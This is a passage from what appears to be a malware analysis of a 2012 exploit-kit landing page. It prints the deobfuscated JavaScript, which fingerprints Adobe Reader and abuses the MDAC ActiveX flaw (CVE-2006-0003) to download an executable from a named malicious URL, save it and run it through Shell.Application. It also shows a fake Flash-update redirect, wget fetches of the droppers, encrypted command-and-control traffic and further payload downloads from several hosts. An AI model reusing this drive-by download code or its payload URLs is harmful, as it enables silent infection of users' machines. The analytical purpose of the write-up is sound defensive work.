  384. ;
  385. try {
  386. f = new b.AXO(a)
  387. }
  388. catch (d){
  389. }
  390. return f
  391. }
  392. , convertFuncs : function (f){
  393. var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
  394. for (ain f){
  395. if (b.test(a)){
  396. try {
  397. g = a.slice(2);
  398. if (g.length > 0 &&! f[g]){
  399. f[g] = f[a](f);
  400. deletef[a]
  401. }
  402. }
  403. catch (d){
  404. }
  405. }
  406. }
  407. }
  408. , initObj : function (e, b, d){
  409. var a, c;
  410. if (e){
  411. if (e[b[0]] == 1 || d){
  412. for (a = 0; a < b.length; a = a + 2){
  413. e[b[a]] = b[a + 1]
  414. }
  415. }
  416. for (ain e){
  417. c = e[a];
  418. if (c && c[b[0]] == 1){
  419. this .initObj(c, b)
  420. }
  421. }
  422. }
  423. }
  424. , initScript : function (){
  425. var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
  426. b = a.platform || "", h = a.product || "";
  427. c.initObj(c, ["$", c]);
  428. for (fin c.Plugins){
  429. if (c.Plugins[f]){
  430. c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
  431. }
  432. }
  433. ;
  434. c.OS = 100;
  435. if (b){
  436. var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
  437. 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  438. , 100];
  439. for (f = d.length - 2; f >= 0; f = f - 2){
  440. if (d[f] && new RegExp(d[f], "i").test(b)){
  441. c.OS = d[f + 1];
  442. break
  443. }
  444. }
  445. }
  446. c.convertFuncs(c);
  447. c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
  448. "body")[0] || document.body || null);
  449. c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
  450. c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
  451. null ;
  452. c.ActiveXEnabled = false;
  453. if (c.isIE){
  454. var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
  455. "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
  456. "Scripting.Dictionary", "wmplayer.ocx"];
  457. for (f = 0; f < j.length; f ++ ){
  458. if (c.getAXO(j[f])){
  459. c.ActiveXEnabled = true;
  460. break
  461. }
  462. }
  463. }
  464. c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
  465. c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
  466. "0.9") : null;
  467. c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
  468. c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
  469. c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
  470. /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
  471. c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
  472. RegExp.$1) : null;
  473. c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
  474. c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
  475. parseFloat(RegExp.$1, 10) : null;
  476. c.addWinEvent("load", c.handler(c.runWLfuncs, c))
  477. }
  478. , init : function (d){
  479. var c = this , b, d, a = {
  480. status :- 3, plugin : 0
  481. }
  482. ;
  483. if (!c.isString(d)){
  484. return a
  485. }
  486. if (d.length == 1){
  487. c.getVersionDelimiter = d;
  488. return a
  489. }
  490. d = d.toLowerCase().replace(/\s/g, "");
  491. b = c.Plugins[d];
  492. if (!b ||! b.getVersion){
  493. return a
  494. }
  495. a.plugin = b;
  496. if (!c.isDefined(b.installed)){
  497. b.installed = null;
  498. b.version = null;
  499. b.version0 = null;
  500. b.getVersionDone = null;
  501. b.pluginName = d
  502. }
  503. c.garbage = false;
  504. if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
  505. a.status =- 2;
  506. return a
  507. }
  508. a.status = 1;
  509. return a
  510. }
  511. , fPush : function (b, a){
  512. var c = this ;
  513. if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
  514. ])))){
  515. a.push(b)
  516. }
  517. }
  518. , callArray : function (b){
  519. var c = this , a;
  520. if (c.isArray(b)){
  521. for (a = 0; a < b.length; a ++ ){
  522. if (b[a] === null){
  523. return
  524. }
  525. c.call(b[a]);
  526. b[a] = null
  527. }
  528. }
  529. }
  530. , call : function (c){
  531. var b = this , a = b.isArray(c) ? c.length :- 1;
  532. if (a > 0 && b.isFunc(c[0])){
  533. c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  534. }
  535. else {
  536. if (b.isFunc(c)){
  537. c(b)
  538. }
  539. }
  540. }
  541. , getVersionDelimiter : ",", $$getVersion : function (a){
  542. return function (g, d, c){
  543. var e = a.init(g), f, b, h = {
  544. }
  545. ;
  546. if (e.status < 0){
  547. return null
  548. }
  549. ;
  550. f = e.plugin;
  551. if (f.getVersionDone != 1){
  552. f.getVersion(null, d, c);
  553. if (f.getVersionDone === null){
  554. f.getVersionDone = 1
  555. }
  556. }
  557. a.cleanup();
  558. b = (f.version || f.version0);
  559. b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  560. return b
  561. }
  562. }
  563. , cleanup : function (){
  564. }
  565. , addWinEvent : function (d, c){
  566. var e = this , a = window, b;
  567. if (e.isFunc(c)){
  568. if (a.addEventListener){
  569. a.addEventListener(d, c, false)
  570. }
  571. else {
  572. if (a.attachEvent){
  573. a.attachEvent("on" + d, c)
  574. }
  575. else {
  576. b = a["on" + d];
  577. a["on" + d] = e.winHandler(c, b)
  578. }
  579. }
  580. }
  581. }
  582. , winHandler : function (d, c){
  583. return function (){
  584. d();
  585. if (typeof c == "function"){
  586. c()
  587. }
  588. }
  589. }
  590. , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
  591. var b = {
  592. }
  593. ;
  594. a.winLoaded = true;
  595. a.callArray(a.WLfuncs0);
  596. a.callArray(a.WLfuncs);
  597. if (a.onDoneEmptyDiv){
  598. a.onDoneEmptyDiv()
  599. }
  600. }
  601. , winLoaded : false, $$onWindowLoaded : function (a){
  602. return function (b){
  603. if (a.winLoaded){
  604. a.call(b)
  605. }
  606. else {
  607. a.fPush(b, a.WLfuncs)
  608. }
  609. }
  610. }
  611. , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
  612. function (){
  613. var d = this , b, h, c, a, f, g;
  614. if (d.div && d.div.childNodes){
  615. for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
  616. c = d.div.childNodes[b];
  617. if (c && c.childNodes){
  618. for (h = c.childNodes.length - 1; h >= 0; h -- ){
  619. g = c.childNodes[h];
  620. try {
  621. c.removeChild(g)
  622. }
  623. catch (f){
  624. }
  625. }
  626. }
  627. if (c){
  628. try {
  629. d.div.removeChild(c)
  630. }
  631. catch (f){
  632. }
  633. }
  634. }
  635. }
  636. if (!d.div){
  637. a = document.getElementById(d.divID);
  638. if (a){
  639. d.div = a
  640. }
  641. }
  642. if (d.div && d.div.parentNode){
  643. try {
  644. d.div.parentNode.removeChild(d.div)
  645. }
  646. catch (f){
  647. }
  648. d.div = null
  649. }
  650. }
  651. , DONEfuncs : [], onDoneEmptyDiv : function (){
  652. var c = this , a, b;
  653. if (!c.winLoaded){
  654. return
  655. }
  656. if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
  657. return
  658. }
  659. for (ain c){
  660. b = c[a];
  661. if (b && b.funcs){
  662. if (b.OTF == 3){
  663. return
  664. }
  665. if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
  666. return
  667. }
  668. }
  669. }
  670. for (a = 0; a < c.DONEfuncs.length; a ++ ){
  671. c.callArray(c.DONEfuncs)
  672. }
  673. c.emptyDiv()
  674. }
  675. , getWidth : function (c){
  676. if (c){
  677. var a = c.scrollWidth || c.offsetWidth, b = this ;
  678. if (b.isNum(a)){
  679. return a
  680. }
  681. }
  682. return - 1
  683. }
  684. , getTagStatus : function (m, g, a, b){
  685. var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
  686. g.span, i = c.getWidth(d);
  687. if (!k ||! h ||! d ||! c.getDOMobj(m)){
  688. return - 2
  689. }
  690. if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
  691. return 0
  692. }
  693. if (l >= i){
  694. return - 1
  695. }
  696. try {
  697. if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
  698. if (!m.winLoaded && c.winLoaded){
  699. return 1
  700. }
  701. if (m.winLoaded && c.isNum(b)){
  702. if (!c.isNum(m.count)){
  703. m.count = b
  704. }
  705. if (b - m.count >= 10){
  706. return 1
  707. }
  708. }
  709. }
  710. }
  711. catch (f){
  712. }
  713. return 0
  714. }
  715. , getDOMobj : function (g, a){
  716. var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
  717. try {
  718. if (b && a){
  719. d.div.focus()
  720. }
  721. }
  722. catch (f){
  723. }
  724. return b ? c.firstChild : null
  725. }
  726. , setStyle : function (b, g){
  727. var f = b.style, a, d, c = this ;
  728. if (f && g){
  729. for (a = 0; a < g.length; a = a + 2){
  730. try {
  731. f[g[a]] = g[a + 1]
  732. }
  733. catch (d){
  734. }
  735. }
  736. }
  737. }
  738. , insertDivInBody : function (a, i){
  739. var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
  740. document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
  741. if (!g){
  742. try {
  743. j.write(c + 'div id="' + b + '">o' + c + "/div>");
  744. d = j.getElementById(b)
  745. }
  746. catch (h){
  747. }
  748. }
  749. g = (j.getElementsByTagName("body")[0] || j.body);
  750. if (g){
  751. if (g.firstChild && f.isDefined(g.insertBefore)){
  752. g.insertBefore(a, g.firstChild)
  753. }
  754. else {
  755. g.appendChild(a)
  756. }
  757. if (d){
  758. g.removeChild(d)
  759. }
  760. }
  761. else {
  762. }
  763. }
  764. , insertHTML : function (g, b, h, a, l){
  765. var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
  766. var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
  767. "0px", "visibility", "visible"];
  768. var i =
  769. "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
  770. if (!k.isDefined(a)){
  771. a = ""
  772. }
  773. if (k.isString(g) && (/[^\s]/).test(g)){
  774. g = g.toLowerCase().replace(/\s/g, "");
  775. q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
  776. q += 'style="' + i + 'display:inline;" ';
  777. for (o = 0; o < b.length; o = o + 2){
  778. if (/[^\s]/.test(b[o + 1])){
  779. q += b[o] + '="' + b[o + 1] + '" '
  780. }
  781. }
  782. q += ">";
  783. for (o = 0; o < h.length; o = o + 2){
  784. if (/[^\s]/.test(h[o + 1])){
  785. q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
  786. }
  787. }
  788. q += a + f + "/" + g + ">"
  789. }
  790. else {
  791. q = a
  792. }
  793. if (!k.div){
  794. j = n.getElementById(k.divID);
  795. if (j){
  796. k.div = j
  797. }
  798. else {
  799. k.div = n.createElement("div");
  800. k.div.id = k.divID
  801. }
  802. k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
  803. 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
  804. + "px", "verticalAlign", "baseline", "display", "block"]));
  805. if (!j){
  806. k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
  807. k.insertDivInBody(k.div)
  808. }
  809. }
  810. if (k.div && k.div.parentNode){
  811. k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
  812. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  813. try {
  814. p.innerHTML = q
  815. }
  816. catch (m){
  817. }
  818. ;
  819. try {
  820. k.div.appendChild(p)
  821. }
  822. catch (m){
  823. }
  824. ;
  825. return {
  826. span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
  827. }
  828. }
  829. return {
  830. span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
  831. }
  832. }
  833. , Plugins : {
  834. adobereader : {
  835. mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  836. "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  837. {
  838. }
  839. , pluginHasMimeType : function (d, c, f){
  840. var b = this , e = b.$, a;
  841. for (ain d){
  842. if (d[a] && d[a].type && d[a].type == c){
  843. return 1
  844. }
  845. }
  846. if (e.getMimeEnabledPlugin(c, f)){
  847. return 1
  848. }
  849. return 0
  850. }
  851. , getVersion : function (l, j){
  852. var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
  853. if (d.isString(j)){
  854. j = j.replace(/\s/g, "");
  855. if (j){
  856. k = j
  857. }
  858. }
  859. else {
  860. j = null
  861. }
  862. if (d.isDefined(g.INSTALLED[k])){
  863. g.installed = g.INSTALLED[k];
  864. return
  865. }
  866. if (!d.isIE){
  867. a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  868. if (g.getVersionDone !== 0){
  869. g.getVersionDone = 0;
  870. b = d.getMimeEnabledPlugin(g.mimeType, a);
  871. if (!j){
  872. n = b
  873. }
  874. if (!b && d.hasMimeType(g.mimeType)){
  875. b = d.findNavPlugin(a, 0)
  876. }
  877. if (b){
  878. g.navPluginObj = b;
  879. h = d.getNum(b.description) || d.getNum(b.name);
  880. h = d.getPluginFileVersion(b, h);
  881. if (!h && d.OS == 1){
  882. if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
  883. h = "9"
  884. }
  885. else {
  886. if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
  887. h = "8"
  888. }
  889. }
  890. }
  891. }
  892. }
  893. else {
  894. h = g.version
  895. }
  896. if (!d.isDefined(n)){
  897. n = d.getMimeEnabledPlugin(k, a)
  898. }
  899. g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
  900. }
  901. else {
  902. b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
  903. c =/=\ s * ([ \ d \ .] + ) / g;
  904. try {
  905. f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
  906. ""], "", g))).GetVersions();
  907. for (m = 0; m < 5; m ++ ){
  908. if (c.test(f) && (!h || RegExp.$1 > h)){
  909. h = RegExp.$1
  910. }
  911. }
  912. }
  913. catch (i){
  914. }
  915. g.installed = h ? 1 : (b ? 0 :- 1)
  916. }
  917. if (!g.version){
  918. g.version = d.formatNum(h)
  919. }
  920. g.INSTALLED[k] = g.installed
  921. }
  922. }
  923. , zz : 0
  924. }
  925. }
  926. ;
  927. PluginDetect.initScript();
  928. PluginDetect.getVersion(".");
  929. pdfver = PluginDetect.getVersion("AdobeReader");
  930. }
  931. catch (e){
  932. }
  933. if (typeof pdfver == 'string'){
  934. pdfver = pdfver.split('.')
  935. }
  936. else {
  937. pdfver = [0, 0, 0, 0]
  938. }
  939. function x(s){
  940. d = [];
  941. for (i = 0; i < s.length; i ++ ){
  942. k = (s.charCodeAt(i) - 46).toString(16);
  943. if (k.length == 1)k = "0" + k;
  944. d.push(k);
  945. }
  946. ;
  947. return d.join("");
  948. }
  949. end_redirect = function (){
  950. window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
  951. }
  952. ;
  953. window.onbeforeunload = function (){
  954. return "";
  955. }
  956. ;
  957. try {
  958. var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
  959. ra3.setAttribute("id", ra3);
  960. ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  961. try {
  962. var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
  963. "Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
  964. try {
  965. ra2.open("GET", "
  966. h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
  967. ra2.send();
  968. ra0.type = 1;
  969. ra0.open();
  970. ra0.Write(ra2.responseBody);
  971. ra0.SaveToFile(ra4, 2);
  972. ra0.Close();
  973. }
  974. catch (e){
  975. }
  976. try {
  977. with (ra1){
  978. shellexecute(ra4);
  979. }
  980. }
  981. catch (e){
  982. }
  983. }
  984. catch (e){
  985. }
  986. }
  987. catch (errno){
  988. }
  989. document.write('');
  990. setTimeout(end_redirect, 60000);
  991.  
  992.  
  993. =====================================================
  994. EXPLOITATION & INFECTIONS OCCURED (PE BASED ONLY)
  995. ======================================================
  996.  
  997. 1. MDAC Arbitrary file download via the Microsoft Data Access Components (MDAC) CVE-2006-0003
  998.  
  999. ActiveX controls=BD96C556-65A3-11D0-983A-00C04FC29E36 Created adodb.stream w/shell apps
  1000. using msxml2.XMLh00p download below malware
  1001. using SaveToFile .//..//03ab326.exe to save malware
  1002.  
  1003. --user-agent="Mozila/4.3(X11; U; MacOSX)"
  1004. --cookies=on --keep-session-cookies --save-cookies mycookies.txt
  1005. --referer="h00p://74.200.211.205/SQeyUUzT/js.js"
  1006. "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
  1007. --output-document="03ab326.exe"
  1008. --16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
  1009. => `sample1'
  1010. Resolving ser.luckypetspetsitting.com... 198.143.159.66
  1011. Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
  1012. h00p request sent, awaiting response... 200 OK
  1013. Length: 256,784 (251K) [application/x-msdownload]
  1014. 16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
  1015.  
  1016. 2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
  1017.  
  1018. --18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
  1019. => `update_flash_player.exe'
  1020. Resolving 4.icedambusters.com... 198.74.52.86
  1021. Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
  1022. h00p request sent, awaiting response... 200 OK
  1023. Length: 256,784 (251K) [application/octet-stream]
  1024. 18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS PREVIOUS DROPPED!
  1025.  
  1026.  
  1027. ==============================================================================
  1028. NETWORK FULL ANALYSIS of Trojan, Backdor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
  1029. ================================================================================
  1030.  
  1031. 1) DNS : Standard query A rabbitharky.com
  1032.  
  1033. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1034. 0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
  1035. 0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
  1036. 0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
  1037. 0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
  1038.  
  1039. Standard query response A 198.143.159.66
  1040.  
  1041. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1042. 0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
  1043. 0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
  1044. 0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
  1045. 0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
  1046. 0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
  1047.  
  1048.  
  1049. 2) h00p/1.0 POST: 192.168.7.84 ⇒ 198.143.159.66↓
  1050.  
  1051. POST /forum/viewtopic.php h00p/1.0
  1052. Host: rabbitharky.com
  1053. Accept: */*
  1054. Accept-Encoding: identity, *;q=0
  1055. Content-Length: 257
  1056. Connection: close
  1057. Content-Type: application/octet-stream
  1058. Content-Encoding: binary
  1059. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1060.  
  1061. CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
  1062. ...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
  1063. .....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
  1064. pH...v*].....1..jw`a.....<"....4
  1065. M.R,.._X..h00p/1.1 200 OK
  1066.  
  1067. Server: nginx/0.7.67
  1068. Date: Sat, 27 Oct 2012 08:17:04 GMT
  1069. Content-Type: text/html
  1070. Connection: close
  1071. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  1072.  
  1073.  
  1074. 3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
  1075.  
  1076. GET /CaBPXFg.exe h00p/1.0
  1077. Host: SpringBackColorado.com
  1078. Accept: */*
  1079. Accept-Encoding: identity, *;q=0
  1080. Connection: close
  1081. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1082.  
  1083. h00p/1.1 200 OK
  1084. Date: Sat, 27 Oct 2012 08:17:05 GMT
  1085. Server: Apache
  1086. Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
  1087. Accept-Ranges: bytes
  1088. Content-Length: 424208
  1089. Connection: close
  1090. Content-Type: application/x-msdownload
  1091.  
  1092. MZ......................@.........................................
  1093. ......!..L.!This program cannot be run in DOS mode.$.......PE..L...
  1094. R..P...............2.4...8......@........P....@....................
  1095. ..............\......................................hw..x.........
  1096. ...........n..........,............................................
  1097. ........y...............................text....2.......4..........
  1098. ........ ..`.data....3...P...4...6..............@....reloc..,......
  1099. ......j..............@..B................U..]............U..]......
  1100. ......U...H....H.F.P.=.......L.F.]....U..Q.E......E..h"@..P.F...]..
  1101. ...U...E..M..H...].U...E..@.]......U......E..E..M..M..E......U...T.
  1102. F..E..X.F..
  1103. :
  1104. :
  1105. f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
  1106. ..*.H..
  1107. ........ ....o
  1108. s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
  1109. p....o..K..u..
  1110. ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
  1111.  
  1112. PoC:
  1113.  
  1114. --17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
  1115. => `CaBPXFg.exe'
  1116. Resolving springbackcolorado.com... 64.29.151.221
  1117. Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
  1118. h00p request sent, awaiting response... 200 OK
  1119. Length: 424,208 (414K) [application/x-msdownload]
  1120. 17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
  1121.  
  1122.  
  1123. 4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe h00p/1.0
  1124.  
  1125. GET /cXbAC.exe h00p/1.0
  1126. Host: 180degrees.org.nz
  1127. Accept: */*
  1128. Accept-Encoding: identity, *;q=0
  1129. Connection: close
  1130. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1131.  
  1132. h00p/1.1 200 OK
  1133. Date: Sat, 27 Oct 2012 08:17:12 GMT
  1134. Server: Apache
  1135. Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
  1136. Accept-Ranges: bytes
  1137. Content-Length: 424208
  1138. Connection: close
  1139. Content-Type: application/x-msdownload
  1140.  
  1141. MZ......................@.............................................
  1142. ..!..L.!This program cannot be run in DOS mode.$.......PE..L...R..P...
  1143. ............2.4...8......@........P....@..............................
  1144. ....\......................................hw..x....................n.
  1145. .........,....................................................y.......
  1146. ........................text....2.......4.................. ..`.data..
  1147. ..3...P...4...6..............@....reloc..,............j..............@
  1148. ..B................U..]............U..]............U...H....H.F.P.=...
  1149. ....L.F.]....U..Q.E......E..h"@..P.F...].....U...E..M..H...].U...E..@.
  1150. ]......U......E..E..M..M..E......U...T.F..E..X.F..T.F..M...X.F..U..E..
  1151. M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E......U.;U.s..E...
  1152. :
  1153. :
  1154. f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
  1155. ..*.H..
  1156. ........ ....o
  1157. s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
  1158. p....o..K..u..
  1159. ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
  1160.  
  1161. PoC:
  1162.  
  1163. --17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
  1164. => `cXbAC.exe'
  1165. Resolving 180degrees.org.nz... 66.117.15.147
  1166. Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
  1167. h00p request sent, awaiting response... 200 OK
  1168. Length: 424,208 (414K) [application/x-msdownload]
  1169. 17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
  1170.  
  1171.  
  1172.  
  1173. 5) h00p/1.0 GET weareseasons.com/7yoZf5.exe
  1174.  
  1175. GET /7yoZf5.exe h00p/1.0
  1176. Host: weareseasons.com
  1177. Accept: */*
  1178. Accept-Encoding: identity, *;q=0
  1179. Connection: close
  1180. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1181.  
  1182. h00p/1.1 200 OK
  1183. Date: Sat, 27 Oct 2012 08:17:19 GMT
  1184. Server: Apache
  1185. Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
  1186. ETag: "b008a82d-67910-4cd05d3c57d54"
  1187. Accept-Ranges: bytes
  1188. Content-Length: 424208
  1189. Connection: close
  1190. Content-Type: application/x-msdos-program
  1191.  
  1192. MZ......................@...............................................!
  1193. ..L.!This program cannot be run in DOS mode.$.......PE..L...R..P.........
  1194. ......2.4...8......@........P....@..................................\....
  1195. ..................................hw..x....................n..........,..
  1196. ..................................................y......................
  1197. .........text....2.......4.................. ..`.data....3...P...4...6...
  1198. ...........@....reloc..,............j..............@..B................U.
  1199. .]............U..]............U...H....H.F.P.=.......L.F.]....U..Q.E.....
  1200. :
  1201. :
  1202. I.q.M.B.d.J.3.Z.k.Z.F.U.9.S.K.g.W.6.T.u.2.g.h.B.l.2.L.Q.6.w.t.e.M.c.q.w.K.
  1203. s.M.Z.K.Z.9.m.A.2.q.i.h.R.7.Z.W.r.V.5.N.w.Y.p.f.n.t.Y.P.b.S.D.N.n.N.C.5.2.e
  1204. .F.o.n.I.W.k.M.Y.h.i.c.k.Q.M.j.H.e.9.p.H.G.f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.
  1205. N.W.p.U.v.r.Z.y.x.S.G0
  1206. ..*.H..
  1207. ........ ....o
  1208. s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
  1209. p....o..K..u..
  1210. ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
  1211.  
  1212.  
  1213. PoC:
  1214.  
  1215. --17:54:45-- h00p://weareseasons.com/7yoZf5.exe
  1216. => `7yoZf5.exe'
  1217. Resolving weareseasons.com... 87.106.194.196
  1218. Connecting to weareseasons.com|87.106.194.196|:80... connected.
  1219. h00p request sent, awaiting response... 200 OK
  1220. Length: 424,208 (414K) [application/x-msdos-program]
  1221. 17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
  1222.  
  1223.  
  1224. 6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1225.  
  1226. SYN:
  1227.  
  1228. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1229. 0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
  1230. 0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
  1231. 0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
  1232.  
  1233. REPLIES:
  1234.  
  1235. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1236. 0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
  1237. 0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
  1238. 0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
  1239. 0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
  1240.  
  1241. :-)) LOLZ
  1242.  
  1243.  
  1244. 7)SYN & ACK to Malware Host 195.169.125.228
  1245.  
